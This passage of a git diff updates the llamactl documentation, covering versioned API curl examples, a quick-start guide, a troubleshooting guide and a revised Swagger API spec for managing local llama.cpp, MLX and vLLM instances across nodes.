curl -X POST http://localhost:8080/api/instances/my-llama-instance \
curl -X POST http://localhost:8080/api/v1/instances/my-llama-instance \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
@@ -73,12 +84,14 @@ curl -X POST http://localhost:8080/api/instances/my-llama-instance \
"threads": 8,
"ctx_size": 4096,
"gpu_layers": 32
}
},
"nodes": ["main"]
}'
# Create MLX instance (macOS only)
curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
curl -X POST http://localhost:8080/api/v1/instances/my-mlx-instance \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "mlx_lm",
"backend_options": {
@@ -88,12 +101,14 @@ curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
"max_tokens": 2048
},
"auto_restart": true,
"max_restarts": 3
"max_restarts": 3,
"nodes": ["main"]
}'
# Create vLLM instance
curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
curl -X POST http://localhost:8080/api/v1/instances/my-vllm-instance \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "vllm",
"backend_options": {
@@ -107,60 +122,92 @@ curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
"CUDA_VISIBLE_DEVICES": "0,1",
"NCCL_DEBUG": "INFO",
"PYTHONPATH": "/custom/path"
}
},
"nodes": ["main"]
}'
# Create llama.cpp instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
curl -X POST http://localhost:8080/api/v1/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
}
},
"nodes": ["main"]
}'
# Create instance on specific remote node
curl -X POST http://localhost:8080/api/v1/instances/remote-llama \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-7b.gguf",
"gpu_layers": 32
},
"nodes": ["worker1"]
}'
# Create instance on multiple nodes for high availability
curl -X POST http://localhost:8080/api/v1/instances/multi-node-llama \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-7b.gguf",
"gpu_layers": 32
},
"nodes": ["worker1", "worker2", "worker3"]
}'
```
## Start Instance
### Via Web UI
**Via Web UI**
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
**Via API**
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
curl -X POST http://localhost:8080/api/v1/instances/{name}/start \
-H "Authorization: Bearer <token>"
```
## Stop Instance
### Via Web UI
**Via Web UI**
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
**Via API**
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
curl -X POST http://localhost:8080/api/v1/instances/{name}/stop \
-H "Authorization: Bearer <token>"
```
## Edit Instance
### Via Web UI
**Via Web UI**
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
**Via API**
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
curl -X PUT http://localhost:8080/api/v1/instances/{name} \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <token>" \
-d '{
"backend_options": {
"threads": 8,
@@ -173,31 +220,39 @@ curl -X PUT http://localhost:8080/api/instances/{name} \
Configuration changes require restarting the instance to take effect.
## Export Instance
**Via Web UI**
1. Click the **"More actions"** button (three dots) on an instance card
2. Click **"Export"** to download the instance configuration as a JSON file
## View Logs
### Via Web UI
**Via Web UI**
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
**Via API**
Retrieve the instance logs:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
# Get instance logs
curl http://localhost:8080/api/v1/instances/{name}/logs \
-H "Authorization: Bearer <token>"
```
## Delete Instance
### Via Web UI
**Via Web UI**
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
**Via API**
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
curl -X DELETE http://localhost:8080/api/v1/instances/{name} \
-H "Authorization: Bearer <token>"
```
## Instance Proxy
@@ -205,8 +260,9 @@ curl -X DELETE http://localhost:8080/api/instances/{name}
Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
# Proxy requests to the instance
curl http://localhost:8080/api/v1/instances/{name}/proxy/ \
-H "Authorization: Bearer <token>"
```
All backends provide OpenAI-compatible endpoints. Check the respective documentation:
@@ -216,14 +272,16 @@ All backends provide OpenAI-compatible endpoints. Check the respective documenta
### Instance Health
#### Via Web UI
**Via Web UI**
1. The health status badge is displayed on each instance card
#### Via API
**Via API**
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
curl http://localhost:8080/api/v1/instances/{name}/proxy/health \
-H "Authorization: Bearer <token>"
```

263
docs/quick-start.md Normal file
View File

@@ -0,0 +1,263 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
**Before you begin:** Ensure you have at least one backend installed (llama.cpp, MLX, or vLLM). See the [Installation Guide](installation.md#prerequisites) for backend setup.
## Core Concepts
Before you start, let's clarify a few key terms:
- **Instance**: A running backend server that serves a specific model. Each instance has a unique name and runs independently.
- **Backend**: The inference engine that actually runs the model (llama.cpp, MLX, or vLLM). You need at least one backend installed before creating instances.
- **Node**: In multi-machine setups, a node represents one machine. Most users will just use the default "main" node for single-machine deployments.
- **Proxy Architecture**: Llamactl acts as a proxy in front of your instances. You make requests to llamactl (e.g., `http://localhost:8080/v1/chat/completions`), and it routes them to the appropriate backend instance. This means you don't need to track individual instance ports or endpoints.
## Authentication
Llamactl uses two types of API keys:
- **Management API Key**: Used to authenticate with the Llamactl management API (creating, starting, stopping instances).
- **Inference API Key**: Used to authenticate requests to the OpenAI-compatible endpoints (`/v1/chat/completions`, `/v1/completions`, etc.).
By default, authentication is required. If you don't configure these keys in your configuration file, llamactl will auto-generate them and print them to the terminal on startup. You can also configure custom keys or disable authentication entirely; see the [Configuration](configuration.md) guide for details.
## Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
```
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ MANAGEMENT AUTHENTICATION REQUIRED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔑 Generated Management API Key:
sk-management-...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ INFERENCE AUTHENTICATION REQUIRED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔑 Generated Inference API Key:
sk-inference-...
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⚠️ IMPORTANT
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• These keys are auto-generated and will change on restart
• For production, add explicit keys to your configuration
• Copy these keys before they disappear from the terminal
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Llamactl server listening on 0.0.0.0:8080
```
Copy the **Management** and **Inference** API Keys from the terminal - you'll need them to access the web UI and make inference requests.
By default, Llamactl will start on `http://localhost:8080`.
## Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key from the terminal output.
You should see the Llamactl web interface.
## Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Node**: Select which node to deploy the instance to (defaults to "main" for single-node setups)
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or HuggingFace repo
- **Additional Options**: Backend-specific parameters
!!! tip "Auto-Assignment"
Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
!!! note "Remote Node Deployment"
If you have configured remote nodes in your configuration file, you can select which node to deploy the instance to. This allows you to distribute instances across multiple machines. See the [Configuration](configuration.md#remote-node-configuration) guide for details on setting up remote nodes.
3. Click "Create Instance"
## Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
},
"nodes": ["main"]
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
},
"nodes": ["main"]
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
},
"nodes": ["main"]
}
```
**Remote node deployment example:**
```json
{
"name": "distributed-model",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"gpu_layers": 32
},
"nodes": ["worker1"]
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
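You can also manage instances via the REST API. If authentication is enabled (the default), add `-H "Authorization: Bearer <management-api-key>"` to each request: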
```bash
# List all instances
curl http://localhost:8080/api/v1/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/v1/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="your-inference-api-key" # Use the inference API key from terminal or config
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
!!! note "API Key"
If you disabled authentication in your config, you can use any value for `api_key` (e.g., `"not-needed"`). Otherwise, use the inference API key shown in the terminal output on startup.
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Learn how to manage instances in the [Managing Instances](managing-instances.md) guide
- Explore the [API Reference](api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

File diff suppressed because it is too large Load Diff

View File

@@ -1,25 +1,23 @@
basePath: /api/v1
definitions:
backends.BackendType:
enum:
- llama_cpp
- mlx_lm
- vllm
type: string
x-enum-varnames:
- BackendTypeLlamaCpp
- BackendTypeMlxLm
- BackendTypeVllm
instance.CreateInstanceOptions:
instance.Instance:
properties:
created:
description: Unix timestamp when the instance was created
type: integer
name:
type: string
type: object
instance.Options:
properties:
auto_restart:
description: Auto restart
type: boolean
backend_options:
additionalProperties: {}
environment:
additionalProperties:
type: string
description: Environment variables
type: object
backend_type:
$ref: '#/definitions/backends.BackendType'
idle_timeout:
description: Idle timeout
type: integer
@@ -32,27 +30,10 @@ definitions:
description: seconds
type: integer
type: object
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
server.NodeResponse:
properties:
created:
description: Creation time
type: integer
name:
address:
type: string
status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status
type: object
server.OpenAIInstance:
properties:
@@ -88,7 +69,7 @@ info:
title: llamactl API
version: "1.0"
paths:
/backends/llama-cpp/devices:
/api/v1/backends/llama-cpp/devices:
get:
description: Returns a list of available devices for the llama server
responses:
@@ -104,8 +85,8 @@ paths:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- backends
/backends/llama-cpp/help:
- Backends
/api/v1/backends/llama-cpp/help:
get:
description: Returns the help text for the llama server command
responses:
@@ -121,8 +102,8 @@ paths:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- backends
/backends/llama-cpp/parse-command:
- Backends
/api/v1/backends/llama-cpp/parse-command:
post:
consumes:
- application/json
@@ -140,7 +121,7 @@ paths:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
"400":
description: Invalid request or command
schema:
@@ -157,8 +138,8 @@ paths:
- ApiKeyAuth: []
summary: Parse llama-server command
tags:
- backends
/backends/llama-cpp/version:
- Backends
/api/v1/backends/llama-cpp/version:
get:
description: Returns the version of the llama server command
responses:
@@ -174,8 +155,8 @@ paths:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- backends
/backends/mlx/parse-command:
- Backends
/api/v1/backends/mlx/parse-command:
post:
consumes:
- application/json
@@ -193,7 +174,7 @@ paths:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
"400":
description: Invalid request or command
schema:
@@ -204,8 +185,8 @@ paths:
- ApiKeyAuth: []
summary: Parse mlx_lm.server command
tags:
- backends
/backends/vllm/parse-command:
- Backends
/api/v1/backends/vllm/parse-command:
post:
consumes:
- application/json
@@ -223,7 +204,7 @@ paths:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
"400":
description: Invalid request or command
schema:
@@ -234,8 +215,8 @@ paths:
- ApiKeyAuth: []
summary: Parse vllm serve command
tags:
- backends
/instances:
- Backends
/api/v1/instances:
get:
description: Returns a list of all instances managed by the server
responses:
@@ -243,7 +224,7 @@ paths:
description: List of instances
schema:
items:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
type: array
"500":
description: Internal Server Error
@@ -253,8 +234,8 @@ paths:
- ApiKeyAuth: []
summary: List all instances
tags:
- instances
/instances/{name}:
- Instances
/api/v1/instances/{name}:
delete:
description: Stops and removes a specific instance by name
parameters:
@@ -278,7 +259,7 @@ paths:
- ApiKeyAuth: []
summary: Delete an instance
tags:
- instances
- Instances
get:
description: Returns the details of a specific instance by name
parameters:
@@ -291,7 +272,7 @@ paths:
"200":
description: Instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -304,7 +285,7 @@ paths:
- ApiKeyAuth: []
summary: Get details of a specific instance
tags:
- instances
- Instances
post:
consumes:
- application/json
@@ -320,12 +301,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
responses:
"201":
description: Created instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid request body
schema:
@@ -338,7 +319,7 @@ paths:
- ApiKeyAuth: []
summary: Create and start a new instance
tags:
- instances
- Instances
put:
consumes:
- application/json
@@ -354,12 +335,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
$ref: '#/definitions/instance.Options'
responses:
"200":
description: Updated instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -372,8 +353,8 @@ paths:
- ApiKeyAuth: []
summary: Update an instance's configuration
tags:
- instances
/instances/{name}/logs:
- Instances
/api/v1/instances/{name}/logs:
get:
description: Returns the logs from a specific instance by name with optional
line limit
@@ -404,8 +385,8 @@ paths:
- ApiKeyAuth: []
summary: Get logs from a specific instance
tags:
- instances
/instances/{name}/proxy:
- Instances
/api/v1/instances/{name}/proxy:
get:
description: Forwards HTTP requests to the llama-server instance running on
a specific port
@@ -432,9 +413,10 @@ paths:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to a specific instance
summary: Proxy requests to a specific instance, does not autostart instance
if stopped
tags:
- instances
- Instances
post:
description: Forwards HTTP requests to the llama-server instance running on
a specific port
@@ -461,10 +443,11 @@ paths:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to a specific instance
summary: Proxy requests to a specific instance, does not autostart instance
if stopped
tags:
- instances
/instances/{name}/restart:
- Instances
/api/v1/instances/{name}/restart:
post:
description: Restarts a specific instance by name
parameters:
@@ -477,7 +460,7 @@ paths:
"200":
description: Restarted instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -490,8 +473,8 @@ paths:
- ApiKeyAuth: []
summary: Restart a running instance
tags:
- instances
/instances/{name}/start:
- Instances
/api/v1/instances/{name}/start:
post:
description: Starts a specific instance by name
parameters:
@@ -504,7 +487,7 @@ paths:
"200":
description: Started instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -517,8 +500,8 @@ paths:
- ApiKeyAuth: []
summary: Start a stopped instance
tags:
- instances
/instances/{name}/stop:
- Instances
/api/v1/instances/{name}/stop:
post:
description: Stops a specific instance by name
parameters:
@@ -531,7 +514,7 @@ paths:
"200":
description: Stopped instance details
schema:
$ref: '#/definitions/instance.Process'
$ref: '#/definitions/instance.Instance'
"400":
description: Invalid name format
schema:
@@ -544,7 +527,444 @@ paths:
- ApiKeyAuth: []
summary: Stop a running instance
tags:
- instances
- Instances
/api/v1/nodes:
get:
description: Returns a map of all nodes configured in the server (node name
-> node config)
responses:
"200":
description: Map of nodes
schema:
additionalProperties:
$ref: '#/definitions/server.NodeResponse'
type: object
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List all configured nodes
tags:
- Nodes
/api/v1/nodes/{name}:
get:
description: Returns the details of a specific node by name
parameters:
- description: Node Name
in: path
name: name
required: true
type: string
responses:
"200":
description: Node details
schema:
$ref: '#/definitions/server.NodeResponse'
"400":
description: Invalid name format
schema:
type: string
"404":
description: Node not found
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get details of a specific node
tags:
- Nodes
/api/v1/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- System
/llama-cpp/{name}/:
get:
description: Proxies requests to the llama.cpp UI for the specified instance
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- text/html
responses:
"200":
description: Proxied HTML response
schema:
type: string
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp UI for the instance
tags:
- Llama.cpp
/llama-cpp/{name}/apply-template:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/completion:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/detokenize:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/embeddings:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/infill:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/metrics:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/props:
get:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/reranking:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/slots:
get:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/llama-cpp/{name}/tokenize:
post:
description: Proxies requests to the specified llama.cpp server instance, starting
it on-demand if configured
parameters:
- description: Instance Name
in: path
name: name
required: true
type: string
produces:
- application/json
responses:
"200":
description: Proxied response
schema:
additionalProperties: true
type: object
"400":
description: Invalid instance
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to llama.cpp server instance
tags:
- Llama.cpp
/v1/:
post:
consumes:
@@ -567,7 +987,7 @@ paths:
- ApiKeyAuth: []
summary: OpenAI-compatible proxy endpoint
tags:
- openai
- OpenAI
/v1/models:
get:
description: Returns a list of instances in a format compatible with OpenAI
@@ -585,22 +1005,10 @@ paths:
- ApiKeyAuth: []
summary: List instances in OpenAI-compatible format
tags:
- openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
- OpenAI
securityDefinitions:
ApiKeyAuth:
in: header
name: X-API-Key
type: apiKey
swagger: "2.0"

193
docs/troubleshooting.md Normal file
View File

@@ -0,0 +1,193 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Instance Fails to Start
**Problem:** Instance fails to start or immediately stops
**Solutions:**
1. **Check instance logs** to see the actual error:
```bash
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
2. **Verify backend is installed:**
- **llama.cpp**: Ensure `llama-server` is in PATH
- **MLX**: Ensure `mlx-lm` Python package is installed
- **vLLM**: Ensure `vllm` Python package is installed
3. **Check model path and format:**
- Use absolute paths to model files
- Verify model format matches backend (GGUF for llama.cpp, etc.)
4. **Verify backend command configuration:**
- Check that the backend `command` is correctly configured in the global config
- For virtual environments, specify the full path to the command (e.g., `/path/to/venv/bin/mlx_lm.server`)
- See the [Configuration Guide](configuration.md) for backend configuration details
- Test the backend directly (see [Backend-Specific Issues](#backend-specific-issues) below)
### Backend-Specific Issues
**Problem:** Model loading, memory, GPU, or performance issues
Most model-specific issues (memory, GPU configuration, performance tuning) are backend-specific and should be resolved by consulting the respective backend documentation:
**llama.cpp:**
- [llama.cpp GitHub](https://github.com/ggml-org/llama.cpp)
- [llama-server README](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
**MLX:**
- [MLX-LM GitHub](https://github.com/ml-explore/mlx-lm)
- [MLX-LM Server Guide](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
**vLLM:**
- [vLLM Documentation](https://docs.vllm.ai/en/stable/)
- [OpenAI Compatible Server](https://docs.vllm.ai/en/stable/serving/openai_compatible_server.html)
- [vllm serve Command](https://docs.vllm.ai/en/stable/cli/serve.html#vllm-serve)
**Testing backends directly:**
Testing your model and configuration directly with the backend helps determine if the issue is with llamactl or the backend itself:
```bash
# llama.cpp
llama-server --model /path/to/model.gguf --port 8081
# MLX
mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --port 8081
# vLLM
vllm serve microsoft/DialoGPT-medium --port 8081
```
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Remote Node Issues
### Node Configuration
**Problem:** Remote instances not appearing or cannot be managed
**Solutions:**
1. **Verify node configuration:**
```yaml
local_node: "main" # Must match a key in nodes map
nodes:
main:
address: "" # Empty for local node
worker1:
address: "http://worker1.internal:8080"
api_key: "secure-key" # Must match worker1's management key
```
2. **Check node name consistency:**
- `local_node` on each node must match what other nodes call it
- Node names are case-sensitive
3. **Test remote node connectivity:**
```bash
curl -H "Authorization: Bearer remote-node-key" \
http://remote-node:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

View File

@@ -1,527 +0,0 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
